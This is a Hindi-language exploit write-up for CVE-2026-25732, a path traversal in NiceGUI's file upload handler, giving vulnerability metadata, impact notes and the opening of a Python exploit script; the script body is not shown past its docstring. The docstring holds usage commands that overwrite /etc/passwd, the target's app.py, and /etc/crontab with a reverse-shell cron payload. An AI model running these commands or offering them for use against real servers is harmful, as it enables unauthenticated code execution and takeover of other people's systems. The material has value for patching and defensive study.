
CVE-2026-25732 के लिए एक्सप्लॉइट, NiceGUI के FileUpload में एक पाथ ट्रैवर्सल जो बिना प्रमाणीकरण के मनमाना फ़ाइल लेखन की अनुमति देता है। एप्लिकेशन फ़ाइलों को ओवरराइट करने या वेबशेल ड्रॉप करने के लिए उपयोग के उदाहरण शामिल हैं।
लेखक: मोहम्मद इदरीस बन्यामेर
संपर्क:
एक्सप्लॉइट शीर्षक: NiceGUI में FileUpload पाथ ट्रैवर्सल जिससे मनमाना फ़ाइल लेखन संभव
दिनांक: 2025-06-06
परीक्षण किया गया: NiceGUI ≤ 3.6.1 (Python 3.8 – 3.12 Linux / Windows पर)
समाधान: NiceGUI 3.7.0 में
CVE: CVE-2026-25732
कमज़ोरी: CWE-22 — प्रतिबंधित निर्देशिका में पाथनाम की अनुचित सीमा
हमला वेक्टर: नेटवर्क
आवश्यक विशेषाधिकार: कोई नहीं
उपयोगकर्ता सहभागिता: कोई नहीं
प्लेटफ़ॉर्म: वेब एप्लिकेशन (NiceGUI / Python)
NiceGUI संस्करण ≤ 3.6.1 ui.upload() / FileUpload हैंडलर में अपलोड की गई फ़ाइलों के name फ़ील्ड को ठीक से सैनिटाइज़ नहीं करते हैं, जब एप्लिकेशन डेवलपर अतिरिक्त सैनिटाइज़ेशन के बिना सेव पथ में मूल फ़ाइलनाम का उपयोग करता है।
यह एक अनप्रमाणित हमलावर को पाथ ट्रैवर्सल अनुक्रमों (../, निरपेक्ष पथ, आदि) के माध्यम से कहीं भी मनमानी फ़ाइलें लिखने की अनुमति देता है, जहाँ NiceGUI प्रक्रिया के पास लिखने की अनुमति है।
सामान्य प्रभाव उदाहरण:
app.py / main.py को अधिलेखित करना → एप्लिकेशन रीलोड/रीस्टार्ट पर कोड निष्पादन/etc/, होम निर्देशिकाओं, .ssh/, कॉन्फ़िगरेशन फ़ोल्डरों आदि में फ़ाइलें लिखना#!/usr/bin/env python3
"""
CVE-2026-25732 — NiceGUI मनमाना फ़ाइल लेखन (पाथ ट्रैवर्सल)
अनसैनिटाइज़्ड FileUpload.name का शोषण करता है जब ऐप इसे सेव पथ में उपयोग करता है।
उपयोग:
python exploit_cve_2026_25732.py http://target:8080 "../etc/passwd" payload.txt
python exploit_cve_2026_25732.py http://target:8080 "../app.py" malicious_app.py
python exploit_cve_2026_25732.py http://target:8080 "nicegui/../../../etc/crontab" revshell-cron
"""